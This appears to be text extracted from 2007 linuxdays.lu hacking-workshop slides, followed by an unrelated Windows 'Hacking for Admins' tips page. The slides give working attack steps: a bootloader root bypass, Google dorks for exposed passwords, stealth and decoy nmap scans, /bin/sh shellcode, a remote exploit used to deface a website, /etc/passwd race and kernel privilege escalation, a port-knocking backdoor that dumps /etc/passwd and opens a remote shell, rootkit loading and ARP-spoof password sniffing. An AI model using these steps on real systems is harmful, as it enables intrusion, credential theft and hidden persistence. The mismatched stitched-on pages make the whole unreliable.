Hacking Techniques
Attackers
Hackers
Spies
Terrorists
Insider
Prof. Crimminaly
Vandals
Objectives
Challange, Status
Political Gain
Financial Gain
Damage
01./02.02.2007 linuxdays.lu 2007 4
Hacking Techniques
Script Kiddies
Hackers
Geek
Stupid Users
Automated Scripts / Viruses / Botnet / Spam
01./02.02.2007 linuxdays.lu 2007 5
Hacking Techniques
- High profile targets:
-- Banks
-- Military
-- Universities
-- Telecom / internet Provide
--Private PC’s / Enduser
-- Botnet
-- Spam
-- Homebanking Data
01./02.02.2007 linuxdays.lu 2007 6
Hacking Techniques
Most often Security problems:
(Source: CSI/FBI Computer Crime and Security Survey)
Virus
Insider
theft Laptop
Deial of Service
Unauthorised
WLAN
Hacking
01./02.02.2007 linuxdays.lu 2007 7
Hacking Techniques
➤Network based System Hacking
➤Web Server Hacking
➤Physically enter the Target Building
➤WLAN (Wireless LAN) Hacking
➤War Dialling
➤Sniffing
➤Social Engineering
➤Viruses
01./02.02.2007 linuxdays.lu 2007 8
Exercise:
-- physical access = root rights --
1. Interupt the bootloader by pressing >> e <<
2. Select the kernel line and press >> e <<
3. add >> init=/bin/bash <<>
4. kernel /vmlinuz-2.6.8 root=/dev/hda4 ro init=/bin/bash
5. Press >> Enter <<
6. Press >> b <<>
7. mount –o remount,rw /dev/hda4
8. passwd hamm ( password: test123)
9. passwd (password: test123)
10.sync
11.mount –o remount,ro /dev/hda4
12.shutdown –rn now
13.Login as user hamm & launch vmware; start all VM from top down
01./02.02.2007 linuxdays.lu 2007 9
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 10
Footprinting
-- Information Gathering --
➤ visit targets’ websites
➤ review HTML Code, JavaScript and Comments & robots.txt
➤ search for passwords, hidden directories, contact names
➤ Dumpster Diving
Quotation Bill Gates in: Susan Lammers; Programmers at Work
Tempus Books; Reissue Edition, 1989
„No, the best way to prepare is to write programs, and to study
great programs that other people have written. In my case, I went
to the garbage cans at the Computer Science Centre and I fished
out listings of their operating system.“
01./02.02.2007 linuxdays.lu 2007 11
Footprinting
-- Information Gathering --
➤ whois request at the Network Information Centre
-- receive information about IP address ranges
-- Names and EMail addresses of responsibles
whois -h whois.dns.lu linuxdays.lu
domainname: linuxdays.lu
nserver: arthur.tudor.lu
nserver: dorado.tudor.lu
org-name: Centre de Recherche Public Henri Tudor
adm-email: pierre.plumer@crpht.lu
tec-name: Xavier Detro
tec-email: xavier.detro@tudor.lu
Important whois domains:
- RIPE (Europe & N-Africa) - APNIC (Asia Pacific)
- ARIN (N-America & S-Africa) - LACNIC (Latin America)
01./02.02.2007 linuxdays.lu 2007 12
Footprinting
-- Exercise Information Gathering --
➤ DNS Lookup
-- use nslookup tools to receive informations about DNS-
& EMAIL Server, looking for names like Oracle, TestLinux, ....
-- try a zone transfer
➤ Footprinting by DNS: nslookup(1); host(1); dig(1);
# nslookup
> server 192.168.22.22
> www.mumm.lu
> set type=mx
> mumm.lu
> set type=any
> mumm.lu
> ls –d mumm.lu # try zone transfer
> exit
# dig @192.168.22.22 mumm.lu axfr # Zonetransfer
01./02.02.2007 linuxdays.lu 2007 13
Footprinting
-- Information Gathering --
➤whois tools:
-- Sam Spade www.samspade.org
-- Smart Whois www.tamos.com
-- Netscan www.netscantools.com
-- GTWhois www.geektools.com
-- http://www.all-nettools.com/toolbox
➤DNS must reads:
-- RFC 1912 Common DNS Errors
-- RFC 2182 Secondary DNS Servers
-- RFC 2219 Use of DNS Aliases
01./02.02.2007 linuxdays.lu 2007 14
Footprinting
-- Information Gathering --
➤ footprinting @ google
➤ news group articles of employees @
➤ search business partners link:
➤ site: intitle:index.of
➤ site: error | warning
➤ site: login | logon
➤ site: username | userid
➤ site: password
➤ site: admin | administrator
➤ site: inurl:backup | inurl:bak
➤ site: intranet
01./02.02.2007 linuxdays.lu 2007 15
Google Hacking
-- Introduction --
The Beginnings:
www.theregister.co.uk/2001/11/28/the_google_attack_engine/
Link points to a Switch of a .gov Network
Google not 'hackers' best friend‘ -- ww.vnunet.com/News/1127162
Index.of +banques +filetype:xls
Johnny (I hack stuff) Long
‘Google Hacking for Penetration Testers’
Google Hacking Database http://johnny.ihackstuff.com
12.03.2006 Chicago Tribune
http://www.heise.de/newsticker/meldung/70752
2600 CIA Agents discovered via Search Engine
01./02.02.2007 linuxdays.lu 2007 16
Google Hacking
-- Introduction --
What to know:
Advanced Operands:
site:
inurl:
filetype:
intitle:
intext:
…… Google as an ‘
Anonymous Proxy’
Google Cache
&strip=1
01./02.02.2007 linuxdays.lu 2007 17
Google Hacking
-- Introduction --
What to know:
The Power of combining Advanced Operands:
site:heise.de –site:www.heise.de
-- shows all websites NOT from the official Webserver
-- maps nre hostnames without contacting target network
-- wap.heise.de, chat.heise.de, www.tb.heise.de, …
Offline Analysis of the search result:
-- www.sensepost.com/research_misc.html
-- SOAP Google API
01./02.02.2007 linuxdays.lu 2007 18
Google Hacking
-- Introduction --
What to find:
The Google Hacking Database (johnny.ihackstuff.com):
-- Directory Listings à Hidden/Private Files
intitle:index.of ‘parent directory’
intitle:index.of.admin
intitle:index.of inurl:admin
intitle:index.of ws_ftp.log
-- Error Messages of Scripts
‘Fatal error: call to undefined function’
–reply –the –next
‘Warning: Failed opening’ include_path
-- Search for vulnerable Scripts
inurl:guestbook/guestbooklist.asp
‘Post Date’ ‘From Country’
-- Search for Backups
filetype:bak inurl:php.bak
filetype:bak inurl:php.bak
-- Search for:
--- Printers; --- Webcams; --- Intranet Sites;
--- Network Tools Ntop, MRTG; --- Databases
01./02.02.2007 linuxdays.lu 2007 19
Google Hacking
-- Exercise --
Livecycle of a Google Hack:
1. Security Problem deicovered on online product;
2. Analyse online product
3. Find typical string
4. Create a google request
5. Find vulnerable websites
Examples:
-- inurl:php.bak mysql_connect mysql_select_db
-- ext:pwd inurl:(service | authors | administrators | users)
"# -FrontPage-“
-- "index of/" "ws_ftp.ini" "parent directory“
-- !Host=*.* intext:enc_UserPassword=* ext:pcf
-- "admin account info" filetype:log
-- enable password | secret "current configuration“
-intext:the
01./02.02.2007 linuxdays.lu 2007 20
Preparation
anonymity doesn’t exist
➤ break systems in different countries / time zones
➤ install network multipurpose tools like netcat or backdoors
➤ hop from host to host to get anonymity
01./02.02.2007 linuxdays.lu 2007 21
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 22
Scanning
-- Goals --
➤ mapping of the target network
➤ use system tools like traceroute & ping
➤ Visual Tools: NeoTrace (Visual Trace) & Visual Route
➤ finding the range of IP addresses
➤ discerning the subnet mask
➤ identify network devices like firewalls & routers
➤ identify servers
➤ mapping of the reachable services
➤ detecting `live` hosts on target network
➤ discovering services / listening ports / portscan; nmap;
➤ identifying operating system & services
➤ identify application behind services & patch level
01./02.02.2007 linuxdays.lu 2007 23
Scanning
-- Network Mapping --
Nmap: find living hosts
$ su –
# ns_mumm
# cat /etc/resolve.conf
# nmap –sL www.mumm.lu/27 # List Scan
(only do nslookup for the IP rage)
# nmap –-packet_trace –sP www.mumm.lu/27 # ICMP/TCP
(send ICMP Echo Request and ACK to Port 80
if RST is received à host is alive / unfiltered )
# nmap –n –P0 –sU –g 53 –p 53 –T polite www.mumm.lu/27
( UDP Scans are alomost NOT usefully; -g 53 = sourceport
-P0 = don’t PingScan first; -T polite = scan speed)
-sF, -sX, -sN, –sA, # not usable
FIN-, XMAS-, Null-, ACK- Scan # today
01./02.02.2007 linuxdays.lu 2007 24
Scanning
-- Port Scanning --
Nmap: port scan (connect scan)
# nmap –n –sT –P0 –p 80 192.168.22.21,22,24
# nmap –n –sT –P0 –p 110 192.168.22.21,22,24
SYN
SYN/ACK
ACK
SYN
RST/ACK
RST/ACK
Port open
Port closed
01./02.02.2007 linuxdays.lu 2007 25
Scanning
-- Port Scanning --
Nmap: port scan (stealth scan)
# nmap –n –sS –P0 –p 80 192.168.22.21,22,24
# nmap –n –sS –P0 –p 110 192.168.22.21,22,24
SYN
SYN/ACK
RST
SYN
RST/ACK
Port open
Port closed
01./02.02.2007 linuxdays.lu 2007 26
Scanning
-- Port Scanning --
Nmap: port scan
# nmap –n –sT –P0 –p 20-25,80,443 192.168.22.21,22,24
# nmap –n –sS –P0 –p 20-25,80,443 192.168.22.21,22,24
Techniques to stay anonymous:
silent scan:
# nmap –n –sT –P0 –T sneaky –p 20-25,80 192.168.22.22
fragmentation scan
# nmap –n –P0 –f –p 20-25,80 192.168.22.22
decoy scan
# nmap –n -P0 –D 1.1.1.1,2.2.2.2,ME,3.3.3.3 –p 80
01./02.02.2007 linuxdays.lu 2007 27
Scanning
-- Exercise --
Scan the MUMM.LU network:
01./02.02.2007 linuxdays.lu 2007 28
Advanced Scanning
-- IP-ID Idle Scan --
Exercise: Who the hell is scanning you?
target perform:
# tcpdump –n –i eth0 host 192.168.4.
attacker perform: (idle_scan)
01./02.02.2007 linuxdays.lu 2007 29
Advanced Scanning
-- IP-ID Idle Scan --
- based on IP-ID prediction
- example with hping2 –SA –p 80 –c 5
- all packets have Fragment-ID Number
- every new packet increases the IP ID Number
- by most systems IP ID + 1
- this is exploitable
- by monitoring the IP ID value of a host
- you know how many packets he sends
- this could be abused for zombie port scanning
01./02.02.2007 linuxdays.lu 2007 30
Advanced Scanning
-- IP-ID Idle Scan --
Step 1: A) send SYN/ACK to Zombie
B) investigate the answer IPID
C) repeate A) and B) multiple times, verify quality of Zombie
IP-ID Probe -> SYN/ACK
Response -> RST; IPID=3
IP-ID Probe -> SYN/ACK Zombie
Response -> RST; IPID=4
IP-ID Probe -> SYN/ACK
Response -> RST; IPID=5
IP-ID Probe -> SYN/ACK
Response -> RST; IPID=2
01./02.02.2007 linuxdays.lu 2007 31
Advanced Scanning
-- IP-ID Idle Scan --
Step 2: A) Send SYN to target BUT spoof the Source IP Adress,
claim to be the Zombie
B) open port: Target send SYN/ACK to Zombie
C) open port: Zombie send RST and increase IPID to Target
SYN;
Port=80;
SRC IP =
SYN/ACK
Zombie
Target
RST; IPID=6
01./02.02.2007 linuxdays.lu 2007 32
Advanced Scanning
-- IP-ID Idle Scan --
Step 2: A) Send SYN to target BUT spoof the Source IP Adress,
claim to be the Zombie
B) close port: Target simply send a RST to the Zombie
SYN;
Port=80;
SRC IP =
RST
Zombie
Target
01./02.02.2007 linuxdays.lu 2007 33
Advanced Scanning
-- IP-ID Idle Scan --
Step 3: A) send SYN/ACK to Zombie
B) investigate the answer IPID
If IPID = 6 à port was close
If IPID = 7 à port was open
IP-ID Probe -> SYN/ACK
Response -> RST; IPID=7
Zombie
01./02.02.2007 linuxdays.lu 2007 34
Advanced Scanning
-- IP-ID Idle Scan --
IP ID Idle Scan with nmap
# nmap –n –P0 –p20-25,80,443 –sI
# nmap –n –P0 –p20-25,80,443 –sI 10.10.10.10 10.10.11.11
01./02.02.2007 linuxdays.lu 2007 35
Scanning
-- Identifying Services --
Banner Grabbing & Version Mapping:
- What services are bound to the port:
-- identifying service / protocoll;
-- identifying Server-Software;
-- identifying Version Number;
-- identifying additional Modules etc.
automatic approach
# nmap –n –p 20-25,80,443 –sV 192.168.22.22,25
# nmap –n –p 20-25,80,443 –oM scan1 192.168.22.22,25
# amap –B –i scan1
# amap –i scan1
01./02.02.2007 linuxdays.lu 2007 36
Scanning
-- Identifying Services --
Banner Grabbing & Version Mapping:
manual approach with Netcat
# nc 192.168.22.22 22
# nc 192.168.22.22 80
HEAD / HTTP/1.0
# nc 192.168.22.21 21
# nc 192.168.22.21 80
HEAD / HTTP/1.0
OS Detection
# nmap –O 192.168.22.22,25
# xprobe2 192.168.22.22
# xprobe2 –p tcp:443:open 192.168.22.22
01./02.02.2007 linuxdays.lu 2007 37
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 38
Gaining Access
-- Where are we now --
At this point we know (without doing something illegal at all):
-- Targets business (products, partners, emplyees)
-- overview of the network topology
-- overview of live servers and open ports
-- services in use, server-software, version numbers
How to proceed:
-- is there a known vulnerability
-- do we know a vulnerability
-- known configuration problems
-- default passwords
prepare attack
-- research on internet for known security holes
-- default passwords; common misconfigurations
-- setup a test environment to practice the attack
-- ideal: fire one single attack
01./02.02.2007 linuxdays.lu 2007 39
Gaining Access
-- prepare attack --
01./02.02.2007 linuxdays.lu 2007 40
Gaining Access
-- prepare attack --
01./02.02.2007 linuxdays.lu 2007 41
Gaining Access
-- prepare attack --
01./02.02.2007 linuxdays.lu 2007 42
Gaining Access
-- prepare attack --
Gaining Access
-- Buffer Overflow --
➤ Stack Based Buffer Overflows
➤ Off-by-One Overflows
➤ Frame Pointer Overwrites
➤ BSS Overflows
➤ Heap Overflows
01./02.02.2007 linuxdays.lu 2007 44
Gaining Access
-- Stack Based Buffer Overflow --
➤ C/C++ problem
➤ programming error
➤ Copy to much variable user input into fixed sized buffer
#include
int main()
{
char name[31];
printf("Please type your name: ");
gets(name);
printf("Hello, %s", name);
return 0;
}
Buffer overflow occur if you enter
`1234567890123456789012345678901234567890`
01./02.02.2007 linuxdays.lu 2007 45
Gaining Access
-- Stack Based Buffer Overflow --
Exploitation:
-- Missing bounds checking
-- Mutiple „unsafe“ functions in libc
-- Executing code in the data/stack segment
-- Creating the to be feed to the application
Memory layout of a process:
Code
Data
Stack high address
low address
no ‘execution’ attribute set
‘read-only’ attribute
LIFO – top of the stack
BSS
Heap
01./02.02.2007 linuxdays.lu 2007 46
Gaining Access
-- Stack Based Buffer Overflow --
-- Stack holding all the information for the function
-- Stack is created at the beginning of a function
-- Stack is released at the end of a function
-- LIFO mechanism to pass arguments to
functions and to reference local variables
void
function (void)
{
[ ... ]
}
int
main (void)
{
int a;
function (argv[1])
[ ... ]
}
Stack
Frame 1
Frame 2 EBP
ESP
EIP: Extended Instruction Pointer
EBP: Extended Base Pointer
ESP: Extended Stack Pointer
POP
PUSH
- function parameters
- local variables
- data to recover previous frame
01./02.02.2007 linuxdays.lu 2007 47
Gaining Access
-- Stack Based Buffer Overflow --
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
Stack
function ()
Frame 2
main ()
Frame 1
Return Address
1
2
3
SFP
4
local variables
buff[512]
args
EIP: Extended Instruction Pointer
EBP: Extended Base Pointer
ESP: Extended Stack Pointer
SFP
saved registers
local variables
ESP
saved registers
args
EBP
EIP
Return Address EIP
01./02.02.2007 linuxdays.lu 2007 48
Gaining Access
-- Stack Based Buffer Overflow --
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
Stack
1
2
3
4
buff[512]
5
Wrong Return
SFP
args
EBP
saved registers
local variables
saved registers
args
function ()
Frame 2
main ()
Frame 1
Return Address
01./02.02.2007 linuxdays.lu 2007 49
Gaining Access
-- Stack Based Buffer Overflow --
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
1
2
3
456
Stack
buff[512]
SFP
args
EBP
saved registers
local variables
saved registers
args
function ()
Frame 2
main ()
Frame 1
Wrong Return
Return Address
01./02.02.2007 linuxdays.lu 2007 50
Gaining Access
-- Stack Based Buffer Overflow --
void
function (char *args)
{
char buff[512];
strcpy (buff, args);
}
int
main (int argc, char *argv[])
{
if (argc > 1)
{
function (argv[1]);
} else
printf ("no input\n");
return 0;
}
Stack
0x0A00
1
2
3
456
0x0800
0x0A00
shellcode 0x0C00
shellcode
nop
nop
0x0A00
0x0A00
function () 0x0A00
Frame 2
main ()
Frame 1
01./02.02.2007 linuxdays.lu 2007 51
Gaining Access
-- Shellcode --
char linux_ia32_shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%a1 */
"\xcd\x80" /* int $0x80 */
Old school payload: bindshell, backconnect
01./02.02.2007 linuxdays.lu 2007 52
Gaining Access
-- Exercise: Web Site defacement --
$ cd /home/hamm/ssl/
$ ls –la
$ ./openSSL 0x73 192.168.22.21 443 –c 40
/usr/bin/whoami
echo "hacked by me….. " > /var/www/html/index.html
- Unprivileged user -> local user privileges escalation
01./02.02.2007 linuxdays.lu 2007 53
Gaining Access
-- Exercise: Web Site defacement --
What do we see on the Firewall???
01./02.02.2007 linuxdays.lu 2007 54
Gaining Access
primary target webserver
-- why they are so vulnerable --
➤complex application
➤multiple subsystems:
application server, scripts, sql-server
➤self made applications:
programmers don’t know how to write secure code
➤Shell-Command-Injection:
bypass commands through the shell
Input: "Alice; rm - rf"
➤SQL-Injection
bypass SQL Commands by User input
Input: "User=Alice' -&Pass=Idontknow"
01./02.02.2007 linuxdays.lu 2007 55
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 56
Maintaining Access
-- be silent --
➤after a successful initial attack
➤ hide the tracks from logfiles
➤ expand local rights; find vulnerabilities in network
➤ install rootkits, steal password database, start
network sniffer
➤ try same password on other systems
➤ find problems in topology (ex. dual homed hosts)
➤ try to attack the private network
01./02.02.2007 linuxdays.lu 2007 57
Maintaining Access
Privileges Escalation
-- Race Condition --
what could I try to attack?
- SUID / SGID binaries
find / -perm –4000 –type f –user root –print
find / -perm –2000 –type f –group root –print
- privileged process
- Kernel
- password file
Source of problems?
- configuration error
- local software vulnerabilities
-- buffer overflow
-- race condition
-- format string
01./02.02.2007 linuxdays.lu 2007 58
Maintaining Access
Privileges Escalation
-- example: race_bug --
#include
#include
int
main (int argc, char *argv[])
{
char path[] = "/tmp/race.txt"
FILE *fp;
fp = fopen (path, "a+");
fprintf (fp, "%s\n", argv[1]);
fclose (fp);
unlink (path);
return 0;
}
01./02.02.2007 linuxdays.lu 2007 59
Maintaining Access
Privileges Escalation
-- example: race_bug --
Prepare attack
$ cd /home/hamm/race
$ ls –la
$ ./race_bug test
$ ls –la /tmp
$ cat /etc/passwd
$ su -; cp /etc/passwd /etc/passwd.bak; exit
Attak:
$ ln –s /etc/passwd /tmp/race.txt
$ ls –la /tmp
$ cat command
$ ./command
$ ls –la /tmp
$ cat /etc/passwd
$ su – bimbam
# id
01./02.02.2007 linuxdays.lu 2007 60
Maintaining Access
Privileges Escalation
-- Exercise: privileges escalation --
$ su –
# cd /home/hamm/ssl/
# ls –la
# cp p /tftpboot
# /etc/init.d/atftpd start
# exit
$ ./openSSL 0x73 192.168.22.21 443 –c 40
/usr/bin/whoami
pwd
/usr/bin/tftp 192.168.22.1
mode binary # local root exploit
get p # kernel 2.2.x 2.4.x
quit
ls –l
chmod +x p
ls –l
./p
whoami
01./02.02.2007 linuxdays.lu 2007 61
Maintaining Access
Port Knocking
-- introduction --
Aka Port Knocking Back Door
- Open Port?????
- no promisc mode, no open ports
- raw sockets
- trigger for special packets to get activated
- attacker:
-- send trigger pkg1
-- send trigger pkg2
-- send trigger pkg3
-- send command pkg1
- example: Sadoor
http://cmn.listptojects.darklab.org
Port 80, 443 open; statefull
01./02.02.2007 linuxdays.lu 2007 62
Maintaining Access
Port Knocking
-- Sadoor example --
Sadoor daemon configuration: /etc/sadoor/sadoor.pkts
# key 1
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
icmp {
type = 8;
}
}
}
# key 2
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
tcp {
flags = SYN;
dport = 80;
sport = 3456;
}
}
}
01./02.02.2007 linuxdays.lu 2007 63
Maintaining Access
Port Knocking
-- Sadoor example --
Sadoor daemon configuration: /etc/sadoor/sadoor.pkts
# key 3
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
udp {
dport = 111;
data { bim\x20bam }
}
}
}
# command
cmdpkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
tcp {
sport = 80;
sport = 12345;
}
}
}
01./02.02.2007 linuxdays.lu 2007 64
Maintaining Access
Port Knocking
-- Sadoor example --
Create a config-image database
and download it to /home/hamm/.sash
mksadb
mv sadoor.db /var/www/html/
chmod 644 /var/www/html/sadoor.db
Run the daemon
/usr/sbin/sadoor
Review logging
tail –f /etc/sadoor/sadoor.log
01./02.02.2007 linuxdays.lu 2007 65
Maintaining Access
Port Knocking
-- Sadoor example --
ON CLIENT side:
1. Download http://testwww.mumm.lu/sadoor.db
2. become root
cd
cd .sash
mv /home/hamm/sadoor.db .
sadbcat sadoor.db sash.db # create encrypted db
rm –f sadoor.db # delete plain sequence
3. Sending commands
sash 192.168.22.24 \
–vv –r "cat /etc/passwd > /var/www/html/test.txt"
sash 192.168.22.24 "chmod 644 /var/www/html/test.txt"
4. Establish a connection / remote shell
sash 192.168.22.24 –vv
sh-2.05b# whoami
sh-2.05b# /sbin/ifconfig
sh-2.05b# exit
01./02.02.2007 linuxdays.lu 2007 66
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
01./02.02.2007 linuxdays.lu 2007 67
Clearing Tracks
Rootkits
-- introduction --
Main goals of a rootkit:
- hide activities of an attacker to the legal administrator
-- active processes
-- directories & files
-- network activities
- provide a backdoor to the system
- let the attacker become root whenever he want
- collect sensitive data
-- from network
-- from user input
01./02.02.2007 linuxdays.lu 2007 68
Clearing Tracks
Rootkits
-- introduction --
1th generation: Binary Rootkits
- replace important system tools by modified versions:
-- du(1), locate(1), netstat(1), ps(1), top(1),
-- ifconfig(1), w(1), who(1), …..
- defined parameters will become invisible in the future:
-- IP Addresses
-- directories & files
-- usernames
- easy to discover:
-- by filesystem inegrity checker: -- tripwire, -- aide
- examples: Irk3-6, (Linux), Fbrk (FreeBSD), Solaris Rootkit
01./02.02.2007 linuxdays.lu 2007 69
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits
- expand the functionality of the kernel
- can be loaded dynamically: insmod(3), rmmod(3)
- implemented as device driver
-> high level of flexibility
- implementations:
-- new modules
-- infecting existing modules
- result: trojaned kernel à full control over all userland apps.
01./02.02.2007 linuxdays.lu 2007 70
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits
- syscalls: a gate between userland and kernel
- example for syscalls: trace /bin/ls
execve(…
uname(…
brk(0)
old_mmap(…
access(…
open(…
open(…
……
01./02.02.2007 linuxdays.lu 2007 71
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits
- normal syscall:
parameter into
registers int 80
selection of the
interrupt handler
Interrupt handler:
syscall selection
Exec syscall
example: mkdir
Userland
Kernel
Interrupt Descriptor Table
(IDT)
Syscall Table
01./02.02.2007 linuxdays.lu 2007 72
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits
- manipulated syscall:
parameter into
registers int 80
selection of the
interrupt handler
Interrupt handler:
syscall selection
Exec syscall
example: mkdir
Userland
Kernel
Interrupt Descriptor Table
(IDT)
Syscall Table
Exec syscall
manipluated: mkdir
01./02.02.2007 linuxdays.lu 2007 73
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM Rootkit: Exercise: mkdir_Rootkit
#define MODULE /* the new mkdir syscall */
#define __KERNEL__ int hack_mkdir (const char *path) {
printk ("BimBam!\n");
#include return 0;
#include }
#include
#include int init_module (void) {
#include orig_mkdir=sys_call_table[SYS_mkdir];
sys_call_table[SYS_mkdir]=hack_mkdir;
MODULE_LICENSE("GPL"); return 0;
}
/* import syscall table */
extern void *sys_call_table[]; void cleanup_module (void) {
sys_call_table[SYS_mkdir]=hack_mkdir;
/* dummy for old mkdir syscall */ }
int (*orig_mkdir) (const char *path);
01./02.02.2007 linuxdays.lu 2007 74
Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM Rootkit: Exercise: mkdir_Rootkit
cd /root/rootkit/mkdir
gcc –c –I /usr/src/linux/include mkdir.c
insmod mkdir.o
lsmod
mkdir test
ls –la
cat /var/log/messages
rmmod mkdir
lsmod
mkdir test
ls –la
Clearing Tracks
Root kits
-- introduction --
2th generation: LKM Rootkit: Adore
cd /root/rootkit/adore/
insmod adore.o
lsmod
insmod cleaner.o
lsmod
rmmod cleaner
lsmod
ps aux | grep ssh
./ava i
ps aux | grep ssh
netstat –punta | grep 22
mkdir /root/rootkit/bimbam
./ava h /root/rootkit/bimbam
ls –la /root/rootkit
./ava –U dummy
01./02.02.2007 linuxdays.lu 2007 76
Clearing Tracks
Rootkits
-- introduction --
3th generation: (Virtual File System) VFS Layer Rootkit
- sys_call_table is not exported anymore
-- Red Hat 8.0 (Kernel 2.4.18)
-- Kernel 2.5.41 à
- all Syscalls which access the Filesystem make use of
the Virtual File System
- in Unix, most of all is handled like a file
- existing Handler-Routines are replaced by modified one
à files/folder could be hidden
à via /proc hidding of processes
01./02.02.2007 linuxdays.lu 2007 77
Clearing Tracks
Rootkits
-- introduction --
3th generation: (Virtual File System) VFS Layer Rootkit
parameter into
registers int 80
selection of the
interrupt handler
Interrupt handler:
syscall selection
Userland
Kernel
Interrupt Descriptor Table
(IDT)
Syscall Table
ext2/ ext3/ ...
VFS
Syscall
01./02.02.2007 linuxdays.lu 2007 78
Hacking Techniques
Insider Attacks
01./02.02.2007 linuxdays.lu 2007 79
Insider Attacks
-- Password Sniffing true a Switch --
Default Gateway
IP: 10.10.10.1
MAC: 11:11:11:11:11:11
IP: 10.10.10.99
MAC: 99:99:99:99:99:99
Attacked PC
IP: 10.10.10.2
MAC: 22:22:22:22:22:22
ARP Reply IP 10.10.10.1 MAC 99:99:99:99:99:99
No gratuitous ARP, BUT directed ARP:
ETHERNET II
Dst: 22:22:22:22:22:22
SRC: 99:99:99:99:99:99
ARP reply:
Sender IP addr: 10.10.10.1
Sender MAC addr: 99:99:99:99:99:99
01./02.02.2007 linuxdays.lu 2007 80
Insider Attacks
-- Password Sniffing true a Switch --
Telnet Client:
IP: 192.168.3.3
IP: ___.___.___.___
Telnet Server:
IP: 192.168.3.4
IP: ___.___.___.___
Exercise:
1. echo 1 > /proc/sys/net/ipv4/ip_forward
2. arpspoof –i eth0 –t 192.168.4.30 192.168.4.28
3. dsniff -cn
Attacker:
IP: 192.168.3.2
MAC: 00:08:74:B3:BB:F1
IP: ___.___.___.___
MAC: __:__:__:__:__:__
01./02.02.2007 linuxdays.lu 2007 81
Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --
SSH Server:
IP: 192.168.3.3
DNS Server:
IP: 158.64.4.
Default Gateway:
IP: 192.168.3.1
Attacker:
IP: 192.168.3.2
Target: SSH Client:
IP: 192.168.3.xx
DNS Response (server_xyz.lu, 192.168.3.2)
DNS Query (HOST: server_xyz.lu)
01./02.02.2007 linuxdays.lu 2007 82
Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --
01./02.02.2007 linuxdays.lu 2007 83
Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --
SSH Server:
IP: 192.168.3.3
DNS Server:
IP: 158.64.4.
Default Gateway:
IP: 192.168.3.1
Attacker:
IP: 192.168.3.2
Target: SSH Client:
IP: 192.168.3.xx
01./02.02.2007 linuxdays.lu 2007 84
Hacking for Admins
by


$UMIT{Fainted Brain}

How to Hide the Partitions?

This trick is for all those people who want to hide tons of data into their box. So here it is, if you have very important data in your hard drive placed in some partition which you do not want anybody to access then this trick is only for you! Just click on start>run type gpedit.msc, now navigate through user configuration> administrative templates > windows components> windows explorer, now double click on “Hide these specified drives in My Computer” modify it accordingly then just below you will find another option “Prevent access to drives from My Computer”, double click on this option and modify it accordingly. To make it visible again select "disable" by double clicking on the “Hide these specified drives in My Computer” option.

You can access all these programs by going through START/RUN.

	SQL Client Configuration - cliconfg
	System Configuration Editor - sysedit
	System Configuration Utility - msconfig
	System File Checker Utility (Scan Immediately)- sfc /scannow
	System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
	System File Checker Utility (Scan On Every Boot) - sfc /scanboot
	System File Checker Utility (Return to Default Setting)- sfc /revert
	System File Checker Utility (Purge File Cache)- sfc /purgecache
	System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
	System Information - msinfo32.
	Task Manager – taskmgr
	System Properties - sysdm.cpl
	Task Manager – taskmgr
	TCP Tester - tcptest
	Telnet Client - telnet
	Tweak UI (if installed) - tweakui
	User Account Management- nusrmgr.cpl
	Utility Manager - utilman
	Windows Address Book - wab
	Windows Address Book Import Utility - wabmig
	Windows Backup Utility (if installed)- ntbackup
	Windows Explorer - explorer
	Windows Firewall- firewall.cpl
	Windows Magnifier- magnify
	Windows Management Infrastructure - wmimgmt.msc
	Windows Media Player - wmplayer
	Windows Messenger - msmsgs
	Windows Picture Import Wizard (need camera connected)- wiaacmgr
	Windows System Security Tool – syskey
	Windows Update Launches - wupdmgr
	Windows Version (to show which version of windows)- winver
	Windows XP Tour Wizard - tourstart
	Wordpad - write
	Password Properties - password.cpl
	Performance Monitor - perfmon.msc
	Phone and Modem Options - telephon.cpl
	Phone Dialer - dialer
	Pinball Game - pinball
	Power Configuration - powercfg.cpl
	Printers and Faxes - control printers
	Printers Folder – printers
	Private Character Editor - eudcedit
